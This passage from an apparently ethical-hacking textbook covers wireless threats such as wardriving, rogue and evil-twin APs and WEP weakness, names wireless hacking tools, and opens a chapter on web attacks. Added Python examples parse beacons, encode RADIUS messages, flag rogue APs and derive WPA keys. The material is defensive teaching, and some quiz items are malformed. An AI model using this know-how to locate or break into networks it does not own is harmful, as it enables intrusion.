attacker will find it more of a speed bump than a wall in finding your network. On the other hand,
turning the SSID broadcast on makes it easier for legitimate clients to find the network as well
as making it easier for an attacker to locate. The question you have to answer in your situation
is what the tradeoff of security versus convenience is for your clients and organization.
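To make the beacon-frame behaviour described above concrete, here is an added Python example (not from the book, and not any scanner's code) that builds a minimal 802.11 beacon and parses back out of it the SSID, the DS channel and the Privacy capability bit, which are the same fields a tool such as Netstumbler reads off the air. The frame layout and information-element numbers (SSID = 0, DS Parameter Set = 3) are the standard ones; the BSSID and network name in the sample are constructed. A zero-length SSID element is what a "hidden" network looks like, which is why turning broadcast off only hides the name, not the beacon.

```python
import struct

TAG_SSID = 0              # information element carrying the network name
TAG_DS_PARAMS = 3         # information element carrying the channel number
CAP_PRIVACY = 0x0010      # capability bit set when the AP requires WEP/WPA


def build_beacon(bssid: bytes, ssid: bytes, channel: int, privacy: bool = True) -> bytes:
    """Build a minimal 802.11 beacon frame (constructed test input, no FCS).

    Layout: 24-byte MAC header, 12 bytes of fixed parameters
    (timestamp, beacon interval, capability info), then tagged parameters.
    """
    frame_control = b"\x80\x00"          # type = management, subtype = beacon
    duration = b"\x00\x00"
    broadcast = b"\xff" * 6              # beacons go to the broadcast address
    header = frame_control + duration + broadcast + bssid + bssid + b"\x00\x00"
    capability = 0x0001 | (CAP_PRIVACY if privacy else 0)   # ESS bit + optional Privacy
    fixed = struct.pack("<QHH", 0, 100, capability)          # 802.11 fields are little-endian
    tags = bytes([TAG_SSID, len(ssid)]) + ssid + bytes([TAG_DS_PARAMS, 1, channel])
    return header + fixed + tags


def parse_beacon(frame: bytes):
    """Extract BSSID, SSID, channel and Privacy flag from a beacon frame.

    Returns None for anything that is not a beacon. An SSID element of zero
    length (or all NUL bytes) is what a 'hidden' network looks like on the air.
    """
    if len(frame) < 36 or (frame[0] & 0xFC) != 0x80:
        return None
    bssid = frame[16:22]                                     # Address 3 in a beacon
    _timestamp, _interval, capability = struct.unpack("<QHH", frame[24:36])
    info = {
        "bssid": ":".join(f"{b:02x}" for b in bssid),
        "privacy": bool(capability & CAP_PRIVACY),
        "ssid": None,
        "hidden": False,
        "channel": None,
    }
    offset = 36
    while offset + 2 <= len(frame):
        tag, length = frame[offset], frame[offset + 1]
        value = frame[offset + 2:offset + 2 + length]
        if len(value) < length:          # truncated element: stop, keep what we have
            break
        if tag == TAG_SSID:
            info["hidden"] = length == 0 or value == b"\x00" * length
            info["ssid"] = "" if info["hidden"] else value.decode("utf-8", "replace")
        elif tag == TAG_DS_PARAMS and length == 1:
            info["channel"] = value[0]
        offset += 2 + length
    return info


if __name__ == "__main__":
    # Constructed sample: a WPA-protected network named CorpNet on channel 6
    sample = build_beacon(bytes.fromhex("001122334455"), b"CorpNet", 6)
    print(parse_beacon(sample))
```

The parser stops cleanly on a truncated element rather than raising, because frames captured from the air are routinely cut short; anything it could not read stays `None`.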

Association with an AP

Before a wireless client can work with a wireless network, a process known as association
must take place. This process is actually quite simple, at least for our purposes, because
association occurs when a wireless client has the SSID preconfigured for the network
it is supposed to be attaching to. When it is configured in a wireless client, it will look
for and then associate to the network whose value has been configured.

The Importance of Authentication

While not required, it is desirable to make sure that only those clients that you want to
attach to your wireless network can do so. In order to restrict this access, authentication
is performed prior to the association process. Authentication can be performed either
in an open or preshared key situation, both offering features that may be desirable.
With open keys, no secure authentication is performed and anyone can connect. When
using this mode, no encryption is performed, so all information is sent in the clear unless
another mechanism provides this feature. In preshared key (PSK) situations, both the
AP and client have the same key entered ahead of time and therefore can authenticate
and associate securely. This also has the benefit of encrypting traffic as well.

In some organizations it is possible that you may have existing tools or infrastructure
in place that can be used to authenticate wireless clients. One of these options is RADIUS,
or Remote Authentication Dial-In User Service.

The RADIUS service is one that is designed to centralize authentication, authorization,
and accounting, or AAA. The service allows user accounts and their authorization
levels to be stored on a single server and have all authentication and
authorization requests forwarded to this location. By consolidating
management in this manner it is possible to simplify administration
and management of the network by making a single location to carry

In practice, when a user connects to a wireless access point, his or her
connection request can be forwarded to a RADIUS server. This request
is then authenticated, authorized, and recorded (accounted), and
access takes place as authorized.
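As an added illustration of the exchange just described (example code, not from the book or from any RADIUS implementation), the Python below encodes an Access-Request the way RFC 2865 specifies, hiding the User-Password under the shared secret and the per-request Request Authenticator, and then checks the Response Authenticator on the server's reply. That check is how the AP knows an Access-Accept really came from a server holding the same secret and answers this request rather than a replayed one. The user name, password and shared secret are constructed sample values.

```python
import hashlib
import hmac
import os
import struct

ACCESS_REQUEST, ACCESS_ACCEPT, ACCESS_REJECT = 1, 2, 3
ATTR_USER_NAME, ATTR_USER_PASSWORD = 1, 2
HEADER_LEN = 20   # code(1) + identifier(1) + length(2) + authenticator(16)


def encode_attribute(attr_type: int, value: bytes) -> bytes:
    """One RADIUS attribute: type, total length, value (RFC 2865 section 5)."""
    return struct.pack("!BB", attr_type, len(value) + 2) + value


def hide_password(password: bytes, secret: bytes, request_auth: bytes) -> bytes:
    """RFC 2865 section 5.2: pad to 16-byte blocks and XOR each block with
    MD5(secret + previous ciphertext block), seeded with the Request Authenticator."""
    padded = password + b"\x00" * (-len(password) % 16)
    out, prev = b"", request_auth
    for i in range(0, len(padded), 16):
        mask = hashlib.md5(secret + prev).digest()
        block = bytes(p ^ m for p, m in zip(padded[i:i + 16], mask))
        out += block
        prev = block
    return out


def reveal_password(hidden: bytes, secret: bytes, request_auth: bytes) -> bytes:
    """Inverse of hide_password; this is the server's side of the exchange."""
    out, prev = b"", request_auth
    for i in range(0, len(hidden), 16):
        mask = hashlib.md5(secret + prev).digest()
        block = hidden[i:i + 16]
        out += bytes(c ^ m for c, m in zip(block, mask))
        prev = block
    return out.rstrip(b"\x00")          # drop the padding added by hide_password


def parse_header(packet: bytes):
    """Return (code, identifier, length) from the first four bytes."""
    return struct.unpack("!BBH", packet[:4])


def build_access_request(ident, username, password, secret, request_auth):
    """Access-Request as the AP (the NAS) sends it on behalf of a connecting client."""
    attrs = encode_attribute(ATTR_USER_NAME, username)
    attrs += encode_attribute(ATTR_USER_PASSWORD, hide_password(password, secret, request_auth))
    header = struct.pack("!BBH", ACCESS_REQUEST, ident, HEADER_LEN + len(attrs))
    return header + request_auth + attrs


def response_authenticator(code, ident, attrs, request_auth, secret):
    """RFC 2865 section 3: MD5(Code + ID + Length + RequestAuth + Attributes + Secret)."""
    header = struct.pack("!BBH", code, ident, HEADER_LEN + len(attrs))
    return hashlib.md5(header + request_auth + attrs + secret).digest()


def build_response(code, ident, attrs, request_auth, secret):
    """Access-Accept or Access-Reject as the server sends it back."""
    header = struct.pack("!BBH", code, ident, HEADER_LEN + len(attrs))
    return header + response_authenticator(code, ident, attrs, request_auth, secret) + attrs


def verify_response(packet, request_auth, secret) -> bool:
    """Client-side check: the reply matches our outstanding request and was
    produced with our shared secret. Truncated or padded packets are rejected."""
    if len(packet) < HEADER_LEN:
        return False
    code, ident, length = parse_header(packet)
    if length < HEADER_LEN or length != len(packet):
        return False
    attrs = packet[HEADER_LEN:length]
    expected = response_authenticator(code, ident, attrs, request_auth, secret)
    return hmac.compare_digest(expected, packet[4:HEADER_LEN])


if __name__ == "__main__":
    secret = b"constructed-shared-secret"        # constructed sample value
    request_auth = os.urandom(16)                # must be unpredictable per request
    req = build_access_request(1, b"alice", b"hunter2", secret, request_auth)
    reply = build_response(ACCESS_ACCEPT, 1, b"", request_auth, secret)
    print("request bytes:", len(req), "accept verified:", verify_response(reply, request_auth, secret))
```

Two design points follow directly from the code: the password hiding is only as strong as the shared secret and the unpredictability of the Request Authenticator (a reused authenticator leaks password blocks by XOR), and the Response Authenticator is a MAC over the reply, so the AP must compare it in constant time and refuse replies whose length field disagrees with the datagram.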

NOTE

wide range of operating systems and is supported by a wide range of
enterprise-level access points.

Network Setup Options

Wireless networks and APs can relate in two ways: ad hoc or through infrastructure.
Each of these options has advantages and disadvantages that make them attractive
options. The following sections show you how they work.

Ad Hoc Network

Ad hoc networks can be created very quickly and easily because no AP is required in
their setup. Ad hoc networks can be thought of as peer-to-peer networks in which each
client can attach to any other client to send and receive information. These clients or
nodes become part of one network sharing a form of SSID known as an Independent
Basic Service Set (IBSS). While these networks are quick to set up, which is the primary
advantage, they do not scale well because they become harder to manage and less secure
as the number of clients grows.

Infrastructure Network

Infrastructure-based wireless networks are networks that use an AP that each client
associates to. Each client in the network setup will be configured to use the SSID of
the AP that will be used to send and receive information. This type of network scales
very well compared with the ad hoc-based networks and is much more likely to be used
in production environments. Additionally, infrastructure networks can scale to a much
larger degree by simply adding more APs to create what is known as an extended service
set (ESS).

Threats to Wireless LANs

Wireless networks offer many benefits similar to wired networks, but differ in the threats
they face. Wireless networks have many threats that are unique to the way the technology
works and each must be understood thoroughly prior to deploying the proper defenses.

Wardriving

Wardriving is the process of an attacker traveling through an area with the goal of
detecting wireless APs or devices. An attacker who wants to engage in wardriving can
do so with very basic equipment, usually a notebook with a wireless card and special
software designed to detect wireless networks. In most cases those engaging in wardriving
are looking to get free Internet access; however it is more than possible for them to do
much worse, such as accessing computers on the network, spreading viruses, or even

Wardriving has led to a family of so-called “war” attacks that are all variations
of the same concept:

• Warwalking — Attackers use a wireless-enabled device to detect wireless
networks as they walk around an area.
• Warbiking — Same technique as warwalking, but on a bike.
• Warflying — Relatively advanced technique that requires the same equipment
as wardriving, but the process uses an aircraft instead of a car.
• Warballooning — An attacker places a GPS and wireless detection gear
on a cluster of small balloons and lets them float over an area. The device
is later retrieved and the data imported into the appropriate software.

X Marks the Spot

Another activity that occurs with all the “war” activities is warchalking. Someone finds
a wireless network and places a marker identifying an AP on a curb, sign, wall, or other
location. Warchalkers have developed their own symbols to mark locations and the type
of AP (open, secured, and so on) that can be looked up online. The name comes from
their usage of chalk to mark symbols in these locations.

Misconfigured Security Settings

Every AP, piece of software, or associated hardware has recommended security settings
provided by the vendor by default or in the instruction booklet. In a vast number of cases,
such as residential or small businesses, APs end up getting implemented without these
most basic of settings configured. In some cases, such as with consumer-grade APs, the
default settings on the equipment allow the device to work “out of the box,” meaning
that those that don’t know otherwise will assume that everything is OK as is.

Unsecured Connections

Another concern with wireless security is what employees or users may be attaching
to. It has been shown that at least 25 percent of business travelers attach to unsecured
APs in locations such as hotels, airports, coffee shops, and other locations. This number
is expected to increase as companies allow more individuals to travel and work in the
field with the associated notebooks and similar devices. The concern with this situation
is twofold: what users are transmitting and what is stored on their systems. Transmitting
information over an unsecured AP can be extremely problematic, and users who leave
wireless access such as Bluetooth enabled on a notebook or cell phone may open them-
selves up to data theft or other dangerous situations.

Plug and Pray?

It is not uncommon for home users or small businesses to purchase a consumer grade
wireless router or AP and then simply plug it in and hope it works. In most cases, the
manufacturer of a given piece of hardware configures the device so it will work out of the
box to eliminate potential frustration on the part of the user when the device doesn’t just
plug in and work like a TV. The problem is that if a consumer plugs in a device such as
a wireless router and it already works, he or she more than likely will not take the basic
steps to secure it.

In other cases consumers have the attitude that they have nothing an attacker would
want. It is not uncommon for a user to believe that the data is what an attacker wants,

Here, There, Everywhere

Rogue APs can appear anywhere and attackers know this — but so do businesses. Some
businesses have taken advantage of the basic human desire to get something for nothing,
such as Internet access. For example, several businesses have placed rogue APs in different
locations up and down the Las Vegas strip. In most cases, the APs are located outside large
hotels where people will try to connect instead of paying the hotel to use their Internet.
The problem with these APs is that many of them go to only one site that may offer
anything from travel and entertainment to adult services.

Rogue APs

A problem with wireless is the appearance of rogue APs that have been installed
without authorization. The problem with rogue APs comes on a few fronts because
they are unmanaged, unknown, and unsecured in most cases. Rogue APs that
are installed without the knowledge of the IT department are by their very nature
unmanaged and have no controls placed upon them. They are known only to specific
individuals, both good and bad. Finally, APs installed in this situation are frequently
subject to little or no security, leading to unrestricted access by any party that locates
the AP.

A new twist on rogue APs adds an element of phishing. In this attack, an attacker
creates a rogue AP with a name that looks the same or is the same as a legitimate AP
with the intention that unsuspecting users will attach to it. Once users attach to this
AP, their credentials can be captured by the attacker. By using the same method, an
attacker can even capture sensitive data as it is transmitted over the network.

Promiscuous Clients

Promiscuous clients are APs that are configured to offer strong signals and the offer
of good performance. The idea behind these types of APs is that a victim will notice the
AP and how strong the signal is and how good the performance is, and then attach to it.
When these APs are nearby, they may be owned by an attacker who has the same goals
as the malicious owner of a rogue AP: to capture information.


Wireless Network Viruses

Viruses exist that are specifically designed to leverage
the strengths and weaknesses of wireless technologies.
Wireless viruses are different because they can replicate
quickly using the wireless network, jumping from system
to system with relative ease. For example, a virus known
as MVW-WIFI can replicate through wireless networks
by using one system to detect other nearby wireless
networks: it then replicates to those networks, at which
point the process repeats.

NOTE

While wireless viruses are restricted to 802.11 networks, they can and
have appeared on other wireless technologies, including Bluetooth
devices. In concept, 802.11 viruses and Bluetooth are the same, but the
difference in practice is how they use their underlying technologies
(wireless or Bluetooth).

Countermeasures

Protection on a wireless network is absolutely essential to consider and consider carefully.
There are several techniques that you may use to protect yourself and your employees
from harm; these include:

• Firewalls — In the case of roaming or remote clients that connect to wireless
networks at the office or at the local coffee shop or airport, a good personal firewall
can provide a much needed level of protection.
• Antivirus — An antivirus should be installed on every computer, and a wireless
client is no exception, especially due to its higher exposure to threats.
• VPN — A virtual private network can enhance protection to a high degree
by encrypting all traffic between the roaming client and the company network.
By using this technique it is possible to work on a wireless network that has
no protection itself and provide this through the VPN.

Wireless Hacking Tools

There are a number of wireless hacking tools available to the attacker who wants
to break into or discover wireless networks. Some of the more common ones include:

• Kismet
• Netstumbler
• Medieval Bluetooth Scanner
• inSSIDer
• Core Impact
• GFI LANguard Network Security Scanner
• CoWPAtty
• Wireshark


[FIGURE 8-1: Netstumbler interface (screenshot not reproduced)]

Netstumbler

Netstumbler is one of the more common tools for locating wireless
networks of the 802.11 persuasion. The software is designed to detect any
wireless network that your wireless network adapter supports (802.11n,
802.11b, 802.11g, and so on). The software also has the ability to interface
with a global positioning system (GPS) to map out the location of the
APs it detects, usually within a good distance of the actual AP. Netstumbler
does not have many options and is very simple to use (see Figure 8-1).

NOTE

Netstumbler also comes in a version known as MiniStumbler, designed
especially for PDAs.

inSSIDer

While Netstumbler software offers a good amount of functionality, it is not the
only product that can perform wireless network scanning. Another piece of software
that can do the same thing is inSSIDer. Metageek, the makers of inSSIDer, describe
the benefits of their tool as follows.


Features unique to inSSIDer include:

• Uses Windows Vista and Windows XP 64-bit
• Uses the Native Wi-Fi application protocol interface (API) and current
wireless network card
• indicator (RSSI), and “Time Last Seen”
• Compatible with most GPS devices (NMEA v2.3 and higher)

The inSSIDer tool can do the following:

• Inspect your WLAN and surrounding networks
to troubleshoot competing APs
• Track the strength of received signals in dBm
(a measurement of decibels) over time
• Filter APs in an easy-to-use format
• Highlight APs for areas with high Wi-Fi concentration
• Export Wi-Fi and GPS data to a Keyhole Markup
Language (KML) file to view in Google Earth

NOTE

Netstumbler has been a staple of wardriving techniques for a while,
but for all its popularity it does have some limitations, one of
which is a lack of 64-bit support. The inSSIDer tool is a full-featured
replacement for Netstumbler.

[FIGURE 8-2: The inSSIDer interface (screenshot not reproduced)]


The inSSIDer interface is shown in Figure 8-2.

Once a target has been identified and its identifying information noted,
the attack can begin.

Protecting Wireless Networks

Wireless networks can be secured if care is taken and knowledge
of the vulnerabilities is possessed by the security professional.
In some ways a wireless network can be secured like a wired
network, but there are techniques specific to wireless networks
that must be considered as well.

Default AP Security

Every AP ships with certain defaults already set; these should
always be changed. Every manufacturer includes some guidance on
what to configure on its APs; this advice should always be followed
and mixed with a healthy dose of experience in what is best. Not
changing the defaults on an AP can be a big detriment to security
because the defaults are generally posted on the manufacturer’s
Web site.

Placement

Placement of a wireless AP can be a potent security measure if undertaken properly.
An AP should be placed to cover the areas it needs to, and not as much of the ones
it doesn’t. For example, an AP should not be located near a window if the people
that will be connecting to it are deeper inside the building or only in the building.
Positioning an AP near a window gives the signal more distance to emanate outside
the building.

Of course, other issues with placement need to be addressed, in particular the
issue of interference. Placement of APs near sources of electromagnetic interference
(EMI) can lead to unusable or unavailable APs. EMI can lead to APs being available
to clients, but with such poor performance that it makes the technology worthless
to the organization.

Emanations

Not much can be done about emanations in a wireless network, but there is something
that can be done to control the scope and range of these emanations. In some cases,
wireless directional antennas can be used to concentrate or focus the signal tightly
into a certain area instead of letting it go everywhere. One type of antenna is the Yagi
antenna, which can focus a signal into a narrow beam, making it difficult to pick up
by others outside the select area.

NOTE

Using a piece of software such as Netstumbler can discover APs. When one is
detected, it is easy to look at the name of the AP and infer that whoever didn’t change
the name from something probably didn’t do anything else, either.

Rogue APs

Rogue APs are somewhat tough to stop, but they can be detected and deterred.

The first action to address with rogue APs is the installation of unauthorized ones
by employees. In this case education is the first line of defense: let employees know that
installation of rogue APs is not allowed and why. Additionally, perform site surveys using
tools such as Netstumbler, Kismet, or any number of commercial wireless site survey
packages to detect rogue APs.

The second issue to deal with is individuals connecting to the wrong or to
unauthorized APs. In these cases education is again key. Let employees know the
names of company-controlled APs and give them information about the dangers
of connecting to unknown APs.
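To show what the site-survey step looks like once the scan is done, here is an added Python example (not the book's, and not the code of Netstumbler, Kismet or any commercial product) that takes survey rows of the kind such scanners export and compares them against an inventory of company-controlled APs. It flags an unknown BSSID advertising the company SSID (the phishing-style rogue described earlier in the chapter), an authorized BSSID seen with a different SSID or channel than the inventory records (a reconfiguration, or a cloned address), and APs still carrying a factory-default name. The inventory, the scan rows and the default-name list are constructed sample data.

```python
# Constructed inventory of company-controlled APs: BSSID -> (SSID, channel)
AUTHORIZED_APS = {
    "00:11:22:33:44:55": ("CorpNet", 6),
    "00:11:22:33:44:66": ("CorpNet", 11),
}

# Constructed list of factory-default network names worth calling out on a survey
DEFAULT_NAMES = {"linksys", "dlink", "default"}

# Constructed survey rows: (bssid, ssid, channel, signal_dbm)
SCAN = [
    ("00:11:22:33:44:55", "CorpNet", 6, -48),
    ("00:11:22:33:44:66", "CorpNet", 11, -60),
    ("de:ad:be:ef:00:01", "CorpNet", 6, -35),    # unknown radio using the company name
    ("00:11:22:33:44:55", "CorpNet", 1, -70),    # known BSSID, but not where inventory says
    ("c0:ff:ee:00:00:02", "Free-WiFi", 3, -55),
    ("C0:FF:EE:00:00:03", "linksys", 6, -80),
]

# Lower number = more urgent to walk down and find
SEVERITY = {
    "evil-twin": 0,
    "authorized-bssid-mismatch": 1,
    "unknown-default-name": 2,
    "unknown": 3,
}


def classify_ap(bssid, ssid, channel, inventory=AUTHORIZED_APS):
    """Verdict for one observed AP against the inventory."""
    bssid = bssid.lower()                       # scanners differ in MAC case
    corporate_ssids = {name for name, _ in inventory.values()}
    if bssid in inventory:
        expected_ssid, expected_channel = inventory[bssid]
        if ssid != expected_ssid or channel != expected_channel:
            return "authorized-bssid-mismatch"  # reconfigured AP, or someone cloned its MAC
        return "authorized"
    if ssid in corporate_ssids:
        return "evil-twin"                      # our name, not our radio
    if ssid.lower() in DEFAULT_NAMES:
        return "unknown-default-name"           # default name suggests nothing else was set up
    return "unknown"


def survey_findings(scan, inventory=AUTHORIZED_APS):
    """Everything in the scan that is not an authorized AP, most urgent first."""
    findings = []
    for bssid, ssid, channel, signal in scan:
        verdict = classify_ap(bssid, ssid, channel, inventory)
        if verdict == "authorized":
            continue
        findings.append({
            "verdict": verdict,
            "bssid": bssid.lower(),
            "ssid": ssid,
            "channel": channel,
            "signal_dbm": signal,
        })
    # most severe first; within a class the strongest (closest) signal first
    findings.sort(key=lambda f: (SEVERITY[f["verdict"]], -f["signal_dbm"]))
    return findings


if __name__ == "__main__":
    for finding in survey_findings(SCAN):
        print(f"{finding['verdict']:26} {finding['bssid']}  {finding['ssid']!r:12} "
              f"ch {finding['channel']:<3} {finding['signal_dbm']} dBm")
```

Signal strength is used only to order the walk-down, not to decide the verdict: a strong evil twin is the one employees will connect to first, which is exactly the case the chapter warns about.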

Use Protection for Transmitted Data

By its very nature, wireless data is transmitted so that anyone who wants to listen in can
do so. In order to protect wireless networks an appropriate authentication technology
should be used. The three that are currently in use are:

• Wired Equivalent Privacy (WEP) — Not much used anymore because it is weak
and only marginally better than no protection at all. WEP was available on all
first-generation wireless networks, but was replaced later with stronger technologies
such as WPA.

In theory, WEP was supposed to provide protection, but in practice poor implementation
resulted in the use of weak keys. It was found that with enough weak keys
simple cryptanalysis could be performed, and a WEP passphrase can now be broken
in a few minutes (sometimes 30 seconds).

NOTE

WEP is listed here in the interest of completeness; however, in practice WEP
should be avoided at all costs due to its well-known weaknesses. Using an
alternative method such as WPA or WPA2 would be much more secure.

• Wi-Fi Protected Access (WPA) — More robust than WEP,
it was designed to replace it in new networks. WPA introduces
stronger encryption and better key management that makes
for a stronger system.

WPA is supported on most wireless APs manufactured
after 2003, and some manufactured prior to this can have
their firmware upgraded. WPA should be used if the AP
offers the ability to use WEP or WPA.

• Wi-Fi Protected Access version 2 (WPA2) — WPA2 is
an upgrade to WPA that introduces stronger encryption
and eliminates a few of the remaining weaknesses in WPA.

Using the appropriate protection for a wireless network is important because it can
protect the network from eavesdropping and other attacks in which an attacker can see
network traffic. Of course, just having a good protection scheme does not make for a safe
environment by itself; there are other factors. In the case of WPA and WPA2, the keys
in use make a major difference for how effective the technology is. Using poorly chosen
or short passwords (or keys) can weaken the protection and make
it breakable by a knowledgeable attacker. When choosing a key
it should be random, be of sufficient length, and adhere to the rules
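As an added example (not from the book) of why the key matters as much as the protocol: in WPA and WPA2 personal mode the 256-bit Pre-Shared Key is not the passphrase itself but PBKDF2-HMAC-SHA1 over the passphrase with the SSID as the salt and 4096 iterations, which is what the Python below computes. The derivation explains two practical points. Anyone who records a client's association handshake can test passphrase guesses offline against it, so the length and randomness of the passphrase are what hold up; and because the SSID is the salt, a default SSID lets tables of precomputed keys be reused against every network with that name. The thresholds in assess_passphrase are this example's own assumptions, not standard limits; the passphrases and SSIDs are sample values, except that the "password"/"IEEE" pair is the published IEEE 802.11i test vector.

```python
import hashlib
import math
import string


def wpa_psk(passphrase: str, ssid: str) -> bytes:
    """Derive the WPA/WPA2 Pre-Shared Key (the PMK) from passphrase and SSID.

    IEEE 802.11i: PSK = PBKDF2-HMAC-SHA1(passphrase, ssid, 4096 iterations, 32 bytes).
    """
    if not 8 <= len(passphrase) <= 63 or not all(32 <= ord(c) <= 126 for c in passphrase):
        raise ValueError("a WPA passphrase is 8 to 63 printable ASCII characters")
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode("ascii"),
                               ssid.encode("utf-8"), 4096, 32)


def passphrase_entropy_bits(passphrase: str) -> float:
    """Rough upper bound: log2(pool size) per character for the classes used."""
    pool = 0
    pool += 26 if any(c in string.ascii_lowercase for c in passphrase) else 0
    pool += 26 if any(c in string.ascii_uppercase for c in passphrase) else 0
    pool += 10 if any(c in string.digits for c in passphrase) else 0
    pool += 33 if any(c in string.punctuation or c == " " for c in passphrase) else 0
    return len(passphrase) * math.log2(pool) if pool else 0.0


# Assumed thresholds for this example, not values taken from a standard
MIN_LENGTH = 20
MIN_ENTROPY_BITS = 80
COMMON_DEFAULT_SSIDS = {"linksys", "dlink", "default"}   # constructed sample list


def assess_passphrase(passphrase: str, ssid: str) -> dict:
    """Derived PSK plus the reasons a defender would reject this passphrase."""
    reasons = []
    if len(passphrase) < MIN_LENGTH:
        reasons.append(f"shorter than {MIN_LENGTH} characters")
    bits = passphrase_entropy_bits(passphrase)
    if bits < MIN_ENTROPY_BITS:
        reasons.append(f"estimated entropy {bits:.0f} bits is below {MIN_ENTROPY_BITS}")
    if ssid.lower() in COMMON_DEFAULT_SSIDS:
        reasons.append("default SSID: precomputed PSK tables for this name can be reused")
    return {
        "psk": wpa_psk(passphrase, ssid).hex(),
        "entropy_bits": bits,
        "weak": bool(reasons),
        "reasons": reasons,
    }


if __name__ == "__main__":
    print(wpa_psk("password", "IEEE").hex())          # 802.11i test vector
    print(assess_passphrase("password", "linksys"))    # constructed weak case
    print(assess_passphrase("Tq9#vL2m!xR4pZ8w&Kd7", "CorpNet"))   # constructed strong case
```

Note that the 4096 PBKDF2 iterations make each guess cost about 8192 SHA-1 operations, which slows an offline attack but does not stop one: that is the reason the passphrase itself, not the protocol, decides the outcome.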

MAC Filtering

Media access control (MAC) address filtering is a way to enforce
access control on a wireless network by registering the MAC
addresses of wireless clients with the AP. Because the MAC address is
supposed to be unique, clients are limited to those systems that have
their MAC preregistered. To set up MAC filtering you need to record
the MAC addresses of each client that will use your AP and register
those clients on the AP.

NOTE

While MAC filtering does provide a level of protection, a determined attacker
can get past it with some knowledge of how networks work. It is also very difficult
to use in all but the smallest environments, as managing MAC lists can become very
cumbersome.

CHAPTER SUMMARY

Wireless communication and networking are technologies that have seen rapid
growth and adoption over the past few years. Many organizations have chosen to
use wireless technologies due to the increased mobility and ability to extend networks
that wireless offers. Wireless has become one of the most widely used technologies
by both consumers and businesses, and will most likely continue to be so.

For all the benefits that wireless offers, the big concern for the security professional
is security. Wireless technologies have many security issues, both real and potential,
that must be addressed by the security professional. The technology suffers from
poor or even overlooked security options by those who either adopted the technology
too quickly or didn’t take the time to understand the issues.

This chapter explored how to use wireless technology in an organization, reaping
its benefits and doing so securely. Like any technology, wireless can be used safely;
it is only a matter of understanding the tools available to make the system secure.
To make wireless secure, you can leverage techniques such as encryption and
authentication together with other features designed to make the system stronger
and more appealing to the business.


KEY CONCEPTS AND TERMS

802.11
Bluebugging
Bluejacking
Bluesnarfing
Multiple input and multiple output (MIMO)
Personal Area Networking (PAN)
Preshared key (PSK)
Wi-Fi
Wireless local area network (WLAN)

CHAPTER 8 ASSESSMENT

1. Wireless refers to all the technologies that
make up 802.11.

A. True
B. False

2. ________ operates at 5 GHz.

A. 802.11a
B. 802.11b
C. 802.11g
D. 802.11n

3. ________ is a short range wireless technology.

4. Which type of network requires an AP?

A. Infrastructure
C. Peer-to-peer
D. Client Server

5. ________ dictate(s) the performance
of a wireless network.

A. Clients
B. Interference
C. APs
D. All of the above

6. ________ blocks systems based on ________.

A. MAC Filtering
B. Authentication
C. Association
D. WEP

7. An ad hoc network scales well in production
environments.

A. True
B. False

8. Which of the following is used to identify
a wireless network?

A. SSID
B. IBSS
C. Key
D. Frequency

9. Several APs grouped together form a(n) ________.

A. BSS
B. SSID
C. BBSS
D. FBS

10. ________ uses trusted devices.

A. 802.11
B. Infrared
C. Bluetooth
D. CSMA

Web and Database Attacks

TODAY THE PUBLIC FACE of just about every organization is its Web site.
Companies host all sorts of content on their servers with the intent that
their customers or potential customers will be able to find out more
about their products and services. A Web site is the first point of contact for
customers and also an attractive target for an attacker. With a well-placed attack,
an individual with an ax to grind can embarrass a company by defacing its
Web site or even by stealing information.

As a security professional, one of the tasks you will be charged with is
safeguarding this asset and the infrastructure that is attached to it. Defending
a Web server will require special care and knowledge to make the information
and content available, but at the same time protect it from unnecessary exposure
to threats. This task is trickier than it sounds because a balance has to be struck
between making the content accessible to the appropriate audience while at
the same time ensuring that it is secure. In addition, the Web server cannot
be considered a standalone entity, because it will usually be attached to the
organization’s own network, meaning threats against the server can flow over
into the company network as well.

Making the situation more complex is the fact that Web servers may host
not only regular Web pages but also Web applications and databases. More and
more organizations are looking to Web services such as streaming video and
Web applications such as SharePoint to make a more dynamic experience for
their clients. Also, organizations are hosting ever-increasing amounts of content
such as databases online for a wide range of reasons. Each of these situations
represents another detail that the security professional must address properly
to make sure that the server and the organization itself are safe and secure.

In this chapter you will learn how to deal with the issues revolving around
Web servers, Web applications, and databases. The issues involved are a diverse
group, but they can be properly dealt with if due care is exercised.

Chapter 9 Topics

This chapter covers the following topics and concepts:

• What attacking Web servers is
• What examining an SQL injection is
• What vandalizing Web servers is
• What database vulnerabilities are

Chapter 9 Goals

When you complete this chapter, you will be able to:

• List the issues facing Web servers
• Discuss issues threatening Web applications

• List the vulnerabilities of Web servers

• List the vulnerabilities of Web applications

• List the challenges that face a webmaster

• Describe how to deface Web sites

• Describe how to enumerate Web services

• Describe how to attack Web applications

• Describe the nature of buffer overflows

• Describe the nature of input validation

• List the methods of denial of service against Web sites

• Describe SQL injections

Attacking Web Servers

One of the popular targets for attack is the Web server and its content. An attacker
wanting to cause an organization grief can attack a server and steal information,
vandalize a site, disrupt services, or even cause a public relations nightmare for an
organization. Consider the fact that the Web server is the public face that customers
and clients quite often see first, so the security of the server and the sites contained
on it becomes even more of an issue to the security professional.

CHAPTER 9 Web and Database Attacks

211

Before going too far, look at Web servers through the eyes of the three classes
of individuals who will be interacting or concerned with the health and wellbeing
of the Web server:

• Server administrator — Concerned with the security of the server because it can
provide an easy means of getting into the local network. It is not unlikely to have a
Web server act as the entry point into the network for malicious code such as viruses,
worms, Trojans, and rootkits. For server administrators, the problem becomes even
more of a challenge because Web servers have become increasingly complex and
feature-rich, with unknown or undocumented options that are left unaddressed.

• Network administrator — Concerned with the fallout from the problems the server
administrator may introduce or overlook. These security problems can lead to holes
that can be exploited to gain access to the company network and the services therein.
These administrators are aware that a Web server needs to be usable by the public
and therefore accessible to the masses, but at the same time to be secure (which can
be in conflict with the former goal).

• End user — The individual who will work with the server the most to access content
and services. Regular users just want to browse to a site and access their desired
content; they do not think about things like Java and ActiveX and the very real
security threats they may be introducing to their system. Making this more of an
issue is the simple fact that the Web browser they are using to access this content
can allow threats to bypass their or the company’s firewall and have a free ride into
the internal network.

Categories of Risk

Risks inherent with Web servers can typically be broken into three categories, each
of which will be examined in more detail. Each of the categories of risk can be matched
to the environments in which each of the users operates:

• Defects and misconfiguration risks — Risks in this category include the ability
to steal information from a server, run scripts or executables remotely, enumerate
servers, and carry out denial of service (DoS) attacks. Attacks in this space are
generally associated with the types of attacks a server administrator or webmaster
would encounter.

• Browser- and network-based risks — Risks of this type include an
attacker capturing network traffic between the client (Web browser)
and server.

• Browser or client-side risks — In this category are risks that affect
the user’s system directly, such as crashing the browser, stealing
information, infecting the system, or having some impact on
the system.

NOTE

Misconfiguration also
covers the act of leaving server
